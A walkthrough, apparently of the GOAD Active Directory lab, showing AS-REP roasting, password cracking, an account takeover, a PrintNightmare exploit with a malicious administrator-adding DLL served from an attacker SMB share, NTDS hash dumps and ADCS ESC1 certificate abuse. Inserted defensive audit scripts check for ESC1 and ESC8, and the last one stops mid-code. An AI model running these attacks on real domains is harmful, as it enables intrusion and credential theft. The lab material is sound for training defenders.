SMB         192.168.56.11   445    WINTERFELL       jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
SMB         192.168.56.11   445    WINTERFELL       sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB         192.168.56.11   445    WINTERFELL       pnightmare2:1123:aad3b435b51404eeaad3b435b51404ee:c103cafa49983dbcf3d8a1c951f46347:::
SMB         192.168.56.11   445    WINTERFELL       WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:fff832f36a735e87c044c58bd0719071:::
SMB         192.168.56.11   445    WINTERFELL       CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:0faddc16c56adadd3e13a71c9efba7bc:::
SMB         192.168.56.11   445    WINTERFELL       samaccountname$:1122:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83:::
SMB         192.168.56.11   445    WINTERFELL       SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:ce2ac7738095b049d102c33c79af95de:::
SMB         192.168.56.11   445    WINTERFELL       [+] Dumped 21 NTDS hashes to /home/bolke/.nxc/logs/ntds/WINTERFELL_192.168.56.11_2026-04-06_173825.ntds of which 17 were added to the database
SMB         192.168.56.11   445    WINTERFELL       [*] To extract only enabled accounts from the output file, run the following command: 
SMB         192.168.56.11   445    WINTERFELL       [*] grep -iv disabled /home/bolke/.nxc/logs/ntds/WINTERFELL_192.168.56.11_2026-04-06_173825.ntds | cut -d ':' -f1
bolke@hacky:~$ 

Next time we will have fun with ADCS (Certifried, ESC1, ESC8, …): Goad pwning part6


Meereen Walkthrough

I looked in BloodHound for users with ASREPRoast enabled and found ESSOS.LOCAL/MISSANDEI.

Let's try running ASREPRoast.

┌──(kali㉿kali)-[~] 
└─$ nxc ldap 192.168.56.23 -u missandei -p '' --asreproast asreproast.hash 
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
LDAP 192.168.56.23 445 BRAAVOS $krb5asrep$23$missandei@ESSOS.LOCAL:dcdfca025e409115dac3015ad2bdad49$8d5164d380201364641c6765135d0f1f396f15de39d107f3a23685f1b6aaacd52 c765146c336f31d9e33d59d614cfc1c05e0bc2bd414dcdee30acf84fef1d469d411 ecadb1ef16ba740692505fb983c5d335bd8d3c120f28f3476ef566a517629863f24 e68cd0d56ce56bd0b617b1bacaeb375d4b06a726809f6fef115cf8eecd0337611e4 259618593628c5058b5d86e9b994b555340086d4f72c57f9954dfd159e8e071d415 b2e8b9e85a3990e300b7253d3f0673c2e317f549dada4fc4b80c6f298f9bc296f1 fb077ddcf7aa31e9592b98bd7f11c572d0132b4fc8b38ce5543ba9415b28bc163e42

I'll run john against the hash.

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt asreproast.hash              
Using default input encoding: UTF-8 
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) 
Will run 4 OpenMP threads 
Press 'q' or Ctrl-C to abort, almost any other key for status 
fr3edom ($krb5asrep$23$missandei@ESSOS.LOCAL)      
1g 0:00:00:01 DONE (2024-10-19 16:58) 0.8333g/s 1496Kp/s 1496Kc/s 1496KC/s franciene..found9tion 
Use the "--show" option to display all of the cracked passwords reliably 
Session completed.

I got the credentials missandei/fr3edom.

In BloodHound, missandei has GenericAll permissions over the user khal.drogo.

So we change the password of khal.drogo.

The tool we will use is ldap_shell.

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ ldap_shell essos.local/missandei -dc-host essos.local 
Password: 
[INFO] Starting interactive shell
missandei# change_password khal.drogo horse 
[INFO] Got User DN: CN=khal.drogo,CN=Users,DC=essos,DC=local 
[INFO] Attempting to set new password of: horse 
[INFO] Password changed successfully!

So by rewriting the password we get the credentials khal.drogo/horse.

If you check, you will see that the credentials have been obtained properly.

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ nxc smb braavos -u khal.drogo -p horse                             
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) 
SMB 192.168.56.23 445 BRAAVOS [+] essos.local\khal.drogo:horse (Pwn3d!)

WinRM authentication also works.

bolke@hacky:~$ nxc winrm braavos -u khal.drogo -p horse
WINRM       192.168.56.23   5985   BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) 
WINRM       192.168.56.23   5985   BRAAVOS          [+] essos.local\khal.drogo:horse (Pwn3d!)

 

For now, evil-winrm gives us a foothold.

bolke@hacky:~$ ewp -u khal.drogo -p horse -i braavos
          _ _            _                             
  _____ _(_| |_____ __ _(_)_ _  _ _ _ __ ___ _ __ _  _ 
 / -_\ V | | |___\ V  V | | ' \| '_| '  |___| '_ | || |
 \___|\_/|_|_|    \_/\_/|_|_||_|_| |_|_|_|  | .__/\_, |
                                            |_|   |__/  v1.6.0

[*] Connecting to 'braavos:5985' as 'khal.drogo'
evil-winrm-py PS C:\Users\khal.drogo\Documents>

 

We will investigate whether PrintNightmare can be used to escalate privileges.

#include <windows.h>
#include <stdlib.h>   // system()

int RunCMD() 
{ 
    system("net users pnightmare Passw0rd123. /add"); 
    system("net localgroup administrators pnightmare /add"); 
    return 0; 
} 

BOOL APIENTRY DllMain(HMODULE hModule, 
    DWORD ul_reason_for_call, 
    LPVOID lpReserved 
) 
{ 
    switch (ul_reason_for_call) 
    { 
    case DLL_PROCESS_ATTACH: 
        RunCMD(); 
        break; 
    case DLL_THREAD_ATTACH: 
    case DLL_THREAD_DETACH: 
    case DLL_PROCESS_DETACH: 
        break; 
    } 
    return TRUE; 
}

This is the code that creates a user called pnightmare and adds it to the administrators group when the DLL is attached to a process.

Compile:

x86_64-w64-mingw32-gcc -shared -o nightmare.dll nightmare.c

Clone the PrintNightmare exploit code.

git clone https://github.com/cube0x0/CVE-2021-1675 printnightmare

Publish the DLL via SMB.

smbserver.py -smb2support ATTACKERSHARE .

And then run PrintNightmare.

┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] 
└─$ python3 CVE-2021-1675.py essos.local/khal.drogo:horse@meereen.essos.local '\\192.168.56.104\ATTACKSHARE\nightmare.dll' 
[*] Connecting to ncacn_np:meereen.essos.local[\PIPE\spoolss] 
[+] Bind OK 
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_e233a12d01c18082\Amd64\UNIDRV.DLL 
[*] Executing \??\UNC\192.168.56.104\ATTACKSHARE\nightmare.dll 
[*] Try 1... 
[*] Stage0: 0 
[*] Try 2... 
[*] Stage0: 0 
[*] Stage2: 0 
[+] Exploit Completed

I got pnightmare/Passw0rd123.

You can confirm it by logging in with evil-winrm.

┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] 
└─$ evil-winrm -u pnightmare -p Passw0rd123. -i meereen 
                                        
Evil-WinRM shell v3.5 
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion 
                                        
Info: Establishing connection to remote endpoint 
*Evil-WinRM* PS C:\Users\pnightmare\Documents> whoami /priv 

PRIVILEGES INFORMATION 
---------------------- 

Privilege Name Description State 
========================================== ========================================================================== 
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled 
SeMachineAccountPrivilege Add workstations to domain Enabled 
SeSecurityPrivilege Manage auditing and security log Enabled 
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled 
SeLoadDriverPrivilege Load and unload device drivers Enabled 
SeSystemProfilePrivilege Profile system performance Enabled 
SeSystemtimePrivilege Change the system time Enabled 
SeProfileSingleProcessPrivilege Profile single process Enabled 
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled 
SeCreatePagefilePrivilege Create a pagefile Enabled 
SeBackupPrivilege Back up files and directories Enabled 
SeRestorePrivilege Restore files and directories Enabled 
SeShutdownPrivilege Shut down the system Enabled 
SeDebugPrivilege Debug programs Enabled 
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled 
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled 
SeUndockPrivilege Remove computer from docking station Enabled 
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled 
SeManageVolumePrivilege Perform volume maintenance tasks Enabled 
SeImpersonatePrivilege Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege Create global objects Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled 
SeTimeZonePrivilege Change the time zone Enabled 
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled 
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled 
*Evil-WinRM* PS C:\Users\pnightmare\Documents>

Now we can dump the NTLM hashes from the NTDS.

┌──(kali㉿kali)-[~/goad/printnightmare/printnightmare] 
└─$ nxc smb meereen.essos.local -u pnightmare -p Passw0rd123. --ntds 
[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option --user <user> to dump a specific user safely or the module -M ntdsutil [Y/n] 
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) 
SMB 192.168.56.12 445 MEEREEN [+] essos.local\pnightmare:Passw0rd123. (Pwn3d!) 
SMB 192.168.56.12 445 MEEREEN [+] Dumping the NTDS, this could take a while so go grab a redbull... 
SMB 192.168.56.12 445 MEEREEN Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da::: 
SMB 192.168.56.12 445 MEEREEN Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
SMB 192.168.56.12 445 MEEREEN krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54798535f08dafb2f3ab805bb312961d::: 
SMB 192.168.56.12 445 MEEREEN DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: 
SMB 192.168.56.12 445 MEEREEN vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b::: 
SMB 192.168.56.12 445 MEEREEN daenerys.targaryen:1112:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a::: 
SMB 192.168.56.12 445 MEEREEN viserys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097::: 
SMB 192.168.56.12 445 MEEREEN khal.drogo:1114:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021::: 
SMB 192.168.56.12 445 MEEREEN jorah.mormont:1115:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611::: 
SMB 192.168.56.12 445 MEEREEN missandei:1116:aad3b435b51404eeaad3b435b51404ee:1b4fd18edf477048c7a7c32fda251cec::: 
SMB 192.168.56.12 445 MEEREEN drogon:1117:aad3b435b51404eeaad3b435b51404ee:195e021e4c0ae619f612fb16c5706bb6::: 
SMB 192.168.56.12 445 MEEREEN sql_svc:1118:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804::: 
SMB 192.168.56.12 445 MEEREEN pnightmare:1121:aad3b435b51404eeaad3b435b51404ee:58cf12d7448ca3ea7da502c83ee6a31e::: 
SMB 192.168.56.12 445 MEEREEN MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:f05997d79fa50e0346a4d593d8eb1741::: 
SMB 192.168.56.12 445 MEEREEN BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:0d8d114e49ff85a35b3c97208d88dcf3:::
SMB 192.168.56.12 445 MEEREEN gmsaDragon$:1119:aad3b435b51404eeaad3b435b51404ee:563b455a419089dfbfa829cab9f2b174::: 
SMB 192.168.56.12 445 MEEREEN removemiccomputer$:1120:aad3b435b51404eeaad3b435b51404ee:1e986d18a9b7c9543e2d57944e8656b7::: 
SMB 192.168.56.12 445 MEEREEN SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:743ab45cdf64d2f368f501fd348ab3d8::: 
SMB 192.168.56.12 445 MEEREEN [+] Dumped 18 NTDS hashes to /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds of which 13 were added to the database                                                                                                                                
SMB 192.168.56.12 445 MEEREEN [*] To extract only enabled accounts from the output file, run the following command: 
SMB 192.168.56.12 445 MEEREEN [*] cat /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds | grep -iv disabled | cut -d ':' -f1 
SMB 192.168.56.12 445 MEEREEN [*] grep -iv disabled /home/kali/.nxc/logs/MEEREEN_192.168.56.12_2024-10-20_143124.ntds | cut -d ':' -f1

Braavos Strategy

Braavos, a server in the domain controlled by Meereen, hosts ADCS. I'd like to attack the ADCS side as well.

SpecterOps's whitepaper provides detailed information on ADCS attacks.

https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf

Let's enumerate the ADCS configuration.

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ certipy-ad find -u 'khal.drogo' -p horse -dc-ip 192.168.56.12 -vulnerable -enabled                              
Certipy v4.8.2 - by Oliver Lyak (ly4k) 

[*] Finding certificate templates 
[*] Found 38 certificate templates 
[*] Finding certificate authorities 
[*] Found 1 certificate authority 
[*] Found 16 enabled certificate templates 
[*] Trying to get CA configuration for 'ESSOS-CA' via CSRA 
[*] Got CA configuration for 'ESSOS-CA' 
[*] Saved BloodHound data to '20241023161533_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k 
[*] Saved text output to '20241023161533_Certipy.txt' 
[*] Saved JSON output to '20241023161533_Certipy.json' 

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ cat 20241023161533_Certipy.txt                                                     
Certificate Authorities 
  0 
    CA Name: ESSOS-CA 
    DNS Name: braavos.essos.local 
    Certificate Subject: CN=ESSOS-CA, DC=essos, DC=local 
    Certificate Serial Number: 5120F6B8733E26BC43F390382A65D06B 
    Certificate Validity Start: 2024-08-11 03:37:50+00:00 
    Certificate Validity End: 2029-08-11 03:47:49+00:00 
    Web Enrollment : Enabled 
    User Specified SAN : Enabled 
    Request Disposition : Issue 
    Enforce Encryption for Requests : Enabled 
    Permissions 
      Owner : ESSOS.LOCAL\Administrators 
      Access Rights 
        ManageCertificates : ESSOS.LOCAL\Administrators 
                                          ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Enterprise Admins 
        ManageCa : ESSOS.LOCAL\Administrators 
                                          ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Enterprise Admins 
        Enroll : ESSOS.LOCAL\Authenticated Users 
    [!] Vulnerabilities 
      ESC6 : Enrollees can specify SAN and Request Disposition is set to Issue. Does not work after May 2022 
      ESC8 : Web Enrollment is enabled and Request Disposition is set to Issue 
Certificate Templates 
  0 
    Template Name : ESC4 
    Display Name : ESC4
    Certificate Authorities : ESSOS-CA 
    Enabled : True 
    Client Authentication : False 
    Enrollment Agent : False 
    Any Purpose : False 
    Enrollee Supplies Subject : False 
    Certificate Name Flag : SubjectRequireDirectoryPath 
                                          SubjectRequireEmail 
                                          SubjectAltRequireUpn 
    Enrollment Flag : AutoEnrollment 
                                          PublishToDs 
                                          PendAllRequests 
                                          IncludeSymmetricAlgorithms 
    Private Key Flag : ExportableKey 
    Extended Key Usage : Code Signing 
    Requires Manager Approval : True 
    Requires Key Archival : False 
    Authorized Signatures Required : 1 
    Validity Period : 1 year 
    Renewal Period : 6 weeks 
    Minimum RSA Key Length : 2048 
    Permissions 
      Enrollment Permissions 
        Enrollment Rights : ESSOS.LOCAL\Domain Users 
      Object Control Permissions 
        Owner : ESSOS.LOCAL\Enterprise Admins 
        Full Control Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\khal.drogo 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Owner Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\khal.drogo 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Dacl Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\khal.drogo 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Property Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\khal.drogo 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins
    [!] Vulnerabilities 
      ESC4 : 'ESSOS.LOCAL\\khal.drogo' has dangerous permissions 
  1 
    Template Name : ESC3-CRA 
    Display Name : ESC3-CRA 
    Certificate Authorities : ESSOS-CA 
    Enabled : True 
    Client Authentication : False 
    Enrollment Agent : True 
    Any Purpose : False 
    Enrollee Supplies Subject : False 
    Certificate Name Flag : SubjectAltRequireUpn 
    Enrollment Flag : AutoEnrollment 
    Private Key Flag : 16842752 
    Extended Key Usage : Certificate Request Agent 
    Requires Manager Approval : False 
    Requires Key Archival : False 
    Authorized Signatures Required : 0 
    Validity Period : 1 year 
    Renewal Period : 6 weeks 
    Minimum RSA Key Length : 2048 
    Permissions 
      Enrollment Permissions 
        Enrollment Rights : ESSOS.LOCAL\Domain Users 
      Object Control Permissions 
        Owner : ESSOS.LOCAL\Enterprise Admins 
        Full Control Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Owner Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Dacl Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Property Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
    [!] Vulnerabilities 
      ESC3 : 'ESSOS.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set 
  2 
    Template Name : ESC2 
    Display Name : ESC2 
    Certificate Authorities : ESSOS-CA
    Enabled : True 
    Client Authentication : True 
    Enrollment Agent : True 
    Any Purpose : True 
    Enrollee Supplies Subject : False 
    Certificate Name Flag : SubjectAltRequireUpn 
    Enrollment Flag : AutoEnrollment 
    Private Key Flag : 16842752 
    Extended Key Usage : Any Purpose 
    Requires Manager Approval : False 
    Requires Key Archival : False 
    Authorized Signatures Required : 0 
    Validity Period : 1 year 
    Renewal Period : 6 weeks 
    Minimum RSA Key Length : 2048 
    Permissions 
      Enrollment Permissions 
        Enrollment Rights : ESSOS.LOCAL\Domain Users 
      Object Control Permissions 
        Owner : ESSOS.LOCAL\Enterprise Admins 
        Full Control Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Owner Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Dacl Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Property Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
    [!] Vulnerabilities 
      ESC2 : 'ESSOS.LOCAL\\Domain Users' can enroll and template can be used for any purpose 
      ESC3 : 'ESSOS.LOCAL\\Domain Users' can enroll and template has Certificate Request Agent EKU set 
  3 
    Template Name : ESC1 
    Display Name : ESC1 
    Certificate Authorities : ESSOS-CA 
    Enabled : True 
    Client Authentication : True 
    Enrollment Agent : False 
    Any Purpose : False
    Enrollee Supplies Subject : True 
    Certificate Name Flag : EnrolleeSuppliesSubject 
    Enrollment Flag : None 
    Private Key Flag : 16842752 
    Extended Key Usage : Client Authentication 
    Requires Manager Approval : False 
    Requires Key Archival : False 
    Authorized Signatures Required : 0 
    Validity Period : 1 year 
    Renewal Period : 6 weeks 
    Minimum RSA Key Length : 2048 
    Permissions 
      Enrollment Permissions 
        Enrollment Rights : ESSOS.LOCAL\Domain Users 
      Object Control Permissions 
        Owner : ESSOS.LOCAL\Enterprise Admins 
        Full Control Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Owner Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Dacl Principals: ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
        Write Property Principals : ESSOS.LOCAL\Domain Admins 
                                          ESSOS.LOCAL\Local System 
                                          ESSOS.LOCAL\Enterprise Admins 
    [!] Vulnerabilities 
      ESC1 : 'ESSOS.LOCAL\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication

Several vulnerable configurations were listed.

This time I'll try attacking with ESC1.
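As an added, defender-side example (not code from this write-up or from Certipy), here is a small Python audit script that parses a Certipy find text report in the layout shown above and flags the ESC1 template conditions and the ESC8 CA conditions that Certipy reported; the embedded report is a constructed sample modelled on the ESSOS-CA output, not the real file.

```python
import re

# Principals whose enrollment right makes a template reachable by any domain member.
LOW_PRIV = {"domain users", "authenticated users", "domain computers", "everyone", "users"}
ENTRY_RE = re.compile(r"^\s*(\d+)\s*$")                 # "  0", "  1", ... open a new entry
KV_RE = re.compile(r"^(\s*)([^:]+?)\s*:\s*(.*?)\s*$")   # "Key : Value" (value may be empty)

# Constructed sample in the layout of the Certipy report above (values mirror ESSOS-CA).
SAMPLE_REPORT = r"""Certificate Authorities
  0
    CA Name                             : ESSOS-CA
    DNS Name                            : braavos.essos.local
    Web Enrollment                      : Enabled
    Request Disposition                 : Issue
Certificate Templates
  0
    Template Name                       : ESC1
    Enabled                             : True
    Client Authentication               : True
    Enrollee Supplies Subject           : True
    Requires Manager Approval           : False
    Authorized Signatures Required      : 0
    Permissions
      Enrollment Permissions
        Enrollment Rights               : ESSOS.LOCAL\Domain Users
  1
    Template Name                       : ESC4
    Enabled                             : True
    Client Authentication               : False
    Enrollee Supplies Subject           : False
    Requires Manager Approval           : True
    Authorized Signatures Required      : 1
    Permissions
      Object Control Permissions
        Full Control Principals         : ESSOS.LOCAL\Domain Admins
                                          ESSOS.LOCAL\khal.drogo
"""

def parse_certipy_report(text):
    """Return {"cas": [...], "templates": [...]}; each entry maps a field to a list of values."""
    report = {"cas": [], "templates": []}
    bucket = entry = last_key = None
    last_indent = -1
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith(("Certificate Authorities", "Certificate Templates")):
            bucket = report["cas" if "Authorities" in line else "templates"]
            entry = None
            continue
        if bucket is not None and ENTRY_RE.match(line):
            entry, last_key = {}, None
            bucket.append(entry)
            continue
        if entry is None:
            continue
        indent = len(line) - len(line.lstrip())
        kv = KV_RE.match(line)
        if kv:
            last_key, last_indent = kv.group(2).strip(), indent
            entry[last_key] = [kv.group(3)] if kv.group(3) else []
        elif last_key is not None and indent > last_indent:
            entry[last_key].append(line.strip())   # continuation of a multi-valued field
        else:
            last_key = None                        # sub-heading such as "Permissions"
    return report

def _first(entry, key, default=""):
    values = entry.get(key, [])
    return values[0] if values else default

def _is_true(entry, key):
    return _first(entry, key).lower() == "true"

def _low_priv_can_enroll(entry):
    return any(p.split("\\")[-1].strip().lower() in LOW_PRIV
               for p in entry.get("Enrollment Rights", []))

def esc1_templates(report):
    """Enabled templates where a low-privileged enrollee chooses the subject of a client-auth cert."""
    return [_first(t, "Template Name") for t in report["templates"]
            if _is_true(t, "Enabled") and _is_true(t, "Client Authentication")
            and _is_true(t, "Enrollee Supplies Subject")
            and not _is_true(t, "Requires Manager Approval")
            and _first(t, "Authorized Signatures Required", "0") == "0"
            and _low_priv_can_enroll(t)]

def esc8_cas(report):
    """CAs with Web Enrollment enabled and Request Disposition Issue, the pair Certipy flags as ESC8."""
    return [_first(ca, "CA Name") for ca in report["cas"]
            if _first(ca, "Web Enrollment").lower() == "enabled"
            and _first(ca, "Request Disposition").lower() == "issue"]

if __name__ == "__main__":
    rep = parse_certipy_report(SAMPLE_REPORT)
    print("ESC1 templates (require approval or remove EnrolleeSuppliesSubject):", esc1_templates(rep))
    print("ESC8 CAs (disable web enrollment or enforce HTTPS with EPA):", esc8_cas(rep))
```

Feed it the saved Certipy text file instead of SAMPLE_REPORT to re-check a lab after the templates have been hardened.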

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ certipy-ad req -u 'khal.drogo@essos.local' -p 'horse' -dc-ip 192.168.56.12 -target 192.168.56.23 -ca 'ESSOS-CA' -template ESC1 -upn 'administrator@essos.local' 
Certipy v4.8.2 - by Oliver Lyak (ly4k) 

[*] Requesting certificate via RPC 
[*] Successfully requested certificate 
[*] Request ID is 9 
[*] Got certificate with UPN 'administrator@essos.local' 
[*] Certificate has no object SID 
[*] Saved certificate and private key to 'administrator.pfx' 

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.56.12 
Certipy v4.8.2 - by Oliver Lyak (ly4k) 

[*] Using principal: administrator@essos.local 
[*] Trying to get TGT... 
[*] Got TGT 
[*] Saved credential cache to 'administrator.ccache' 
[*] Trying to retrieve NT hash for 'administrator' 
[*] Got hash for 'administrator@essos.local': aad3b435b51404eeaad3b435b51404ee:217e50203a5aba59cefa863c724bf61b 

┌──(kali㉿kali)-[~/goad/braavos] 
└─$ ls 
20241023161533_Certipy.json 20241023161533_Certipy.txt 20241023161533_Certipy.zip administrator.ccache administrator.pfx asreproast.hash braavos.nmap missandei.ccache

With the forged certificate I obtained a TGT for the ESSOS Administrator, and the certipy auth step also recovered the account's NT hash (PKINIT logons carry the NTLM credential in the PAC, which Certipy extracts). Both Kerberos and NTLM authentication as Administrator are now available, so anything a Domain Admin can do in essos.local is possible from here.

Note the line "Certificate has no object SID": the certificate lacks the SID extension (szOID_NTDS_CA_SECURITY_EXT) that Microsoft introduced with KB5014754. A DC running in Full Enforcement mode for certificate mapping would reject this certificate for PKINIT; the GOAD DC still accepts it, which is why the attack works as shown.
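The conditions Certipy reports on the ESC1 template above are worth having as an explicit check. The following is an added example, not Certipy's code and not part of GOAD: it encodes the ESC1 preconditions (enrollee supplies subject, client-authentication EKU or no EKU restriction, no manager approval, no authorized signatures, and a low-privileged principal with enroll rights) over a constructed template record. The field names and the three sample templates are my own; the first mirrors the finding on this page, the second is the same template with "supply in request" cleared and manager approval turned on, and the third is admin-only.

```python
"""ESC1 precondition check over a constructed certificate-template record."""
from dataclasses import dataclass

# EKU OIDs that let a certificate authenticate a user to AD. An empty EKU set
# means "any purpose" and is treated as allowing client authentication too.
CLIENT_AUTH_EKUS = frozenset({
    "1.3.6.1.5.5.7.3.2",        # Client Authentication
    "1.3.6.1.5.2.3.4",          # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",   # Smart Card Logon
    "2.5.29.37.0",              # Any Purpose
})

# Principals that effectively mean "any domain account" (compared case-insensitively,
# without the DOMAIN\ prefix).
LOW_PRIV_PRINCIPALS = frozenset({
    "domain users", "domain computers", "authenticated users", "everyone", "users",
})

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # bit in msPKI-Enrollment-Flag (manager approval)


@dataclass(frozen=True)
class Template:
    """Hypothetical, simplified view of a template (not Certipy's JSON schema)."""
    name: str
    name_flags: int = 0               # msPKI-Certificate-Name-Flag
    enrollment_flags: int = 0         # msPKI-Enrollment-Flag
    ra_signatures: int = 0            # msPKI-RA-Signature (authorized signatures)
    ekus: frozenset = frozenset()     # pKIExtendedKeyUsage OIDs
    enroll_rights: frozenset = frozenset()  # principals with Enroll / AutoEnroll


def _short(principal: str) -> str:
    """'ESSOS.LOCAL\\Domain Users' -> 'domain users'."""
    return principal.rsplit("\\", 1)[-1].lower()


def esc1_blockers(t: Template) -> list:
    """Return the reasons the template is NOT ESC1; an empty list means vulnerable."""
    blockers = []
    if not t.name_flags & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("enrollee cannot supply subject/SAN")
    if t.ekus and not (t.ekus & CLIENT_AUTH_EKUS):
        blockers.append("no client-authentication EKU")
    if t.enrollment_flags & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if t.ra_signatures > 0:
        blockers.append(f"{t.ra_signatures} authorized signature(s) required")
    if not any(_short(p) in LOW_PRIV_PRINCIPALS for p in t.enroll_rights):
        blockers.append("no low-privileged principal has enroll rights")
    return blockers


def is_esc1(t: Template) -> bool:
    return not esc1_blockers(t)


# Constructed samples (not dumped from the lab).
ESC1_TEMPLATE = Template(
    name="ESC1",
    name_flags=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    ekus=frozenset({"1.3.6.1.5.5.7.3.2"}),
    enroll_rights=frozenset({"ESSOS.LOCAL\\Domain Users"}),
)
HARDENED_TEMPLATE = Template(   # "supply in request" cleared, approval required
    name="ESC1",
    name_flags=0,
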